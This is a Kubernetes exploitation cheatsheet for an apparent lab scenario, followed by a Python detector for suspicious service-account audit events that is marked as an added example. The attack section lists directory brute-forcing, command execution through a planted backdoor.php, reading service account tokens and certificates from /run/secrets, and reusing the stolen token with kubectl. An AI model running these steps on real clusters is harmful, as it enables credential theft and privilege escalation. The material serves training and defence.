

.:: KUBERNETES Exploitation 2 ::.

~ Cheatsheet ~
cabir - KUBERNETES 2
Title : CLUSTER KUBERNETES - SCENARIO 2 : Inguardians Environment
Author : cabir
Date : Sept 14, 2019
-=[ Privilege escalation with malicious pod ]=-
FingerPrint

    dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt
    dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt -x .php

Result --> backdoor.php

Got an RCE with backdoor.php

    ls /run/secrets/kubernetes.io/serviceaccount
    cat /run/secrets/kubernetes.io/serviceaccount/token
    cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
    cat /run/secrets/kubernetes.io/serviceaccount/namespace

OR

    http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/token
    http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/ca.crt
    http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/namespace

On your computer, download kubectl

    curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl

Try to get pods:

    ./kubectl --token=`cat jwt.token` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods

Response:

    Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:mktg:wordpress" cannot list resource "pods" in API group "" in the namespace "default"

Kubi-Scan :

    python3 KubiScan/KubiScan.py -ho 10.23.58.40:6443 -t jwt.token -c ca.crt -a

    https://10.23.58.40:6443/version
    https://10.23.58.40:10250/pods
    https://10.23.58.40:10250/healthz
    https://10.23.58.40:10250/logs
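
Detection side of the steps above, as an added example that is not part of the original cheatsheet: a scan of API server audit events for a service account token presented from outside the cluster or answered with 403, as in the Forbidden response shown. The sample events, the source addresses and the 10.244.0.0/16 cluster network are constructed assumptions; the field names are those of audit.k8s.io/v1 events.

```python
import ipaddress
import json

# Assumption: the cluster's pod network; replace with your own pod/node CIDRs.
CLUSTER_NETS = [ipaddress.ip_network("10.244.0.0/16")]

# Constructed audit events using audit.k8s.io/v1 field names (not from the page).
SAMPLE_AUDIT_LOG = [
    '{"stage":"ResponseComplete","verb":"list","user":{"username":"system:serviceaccount:mktg:wordpress"},"sourceIPs":["192.0.2.77"],"objectRef":{"resource":"pods","namespace":"default"},"responseStatus":{"code":403}}',
    '{"stage":"ResponseComplete","verb":"get","user":{"username":"system:serviceaccount:mktg:wordpress"},"sourceIPs":["10.244.1.12"],"objectRef":{"resource":"configmaps","namespace":"mktg"},"responseStatus":{"code":200}}',
    '{"stage":"ResponseComplete","verb":"list","user":{"username":"system:serviceaccount:mktg:wordpress"},"sourceIPs":["192.0.2.77"],"objectRef":{"resource":"secrets","namespace":"mktg"},"responseStatus":{"code":200}}',
    '{"stage":"ResponseComplete","verb":"get","user":{"username":"system:node:node1"},"sourceIPs":["192.0.2.10"],"objectRef":{"resource":"nodes"},"responseStatus":{"code":200}}',
    'truncated {"stage":',
]

def is_external(ip):
    """True when ip is outside every configured cluster network (or unparsable)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return not any(addr in net for net in CLUSTER_NETS)

def find_suspicious(lines):
    """Flag service-account requests that came from outside the cluster or were denied."""
    findings = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip damaged log lines instead of aborting the scan
        user = ev.get("user", {}).get("username", "")
        if ev.get("stage") != "ResponseComplete" or not user.startswith("system:serviceaccount:"):
            continue
        reasons = []
        if any(is_external(ip) for ip in ev.get("sourceIPs", [])):
            reasons.append("external-source")
        if ev.get("responseStatus", {}).get("code") == 403:
            reasons.append("forbidden")
        if reasons:
            ref = ev.get("objectRef", {})
            findings.append({"user": user, "verb": ev.get("verb"), "resource": ref.get("resource"),
                             "namespace": ref.get("namespace"), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_AUDIT_LOG):
        print(finding)
```

Depending on the CNI and SNAT behaviour, in-cluster clients may reach the API server with a node address, so node CIDRs usually belong in CLUSTER_NETS as well.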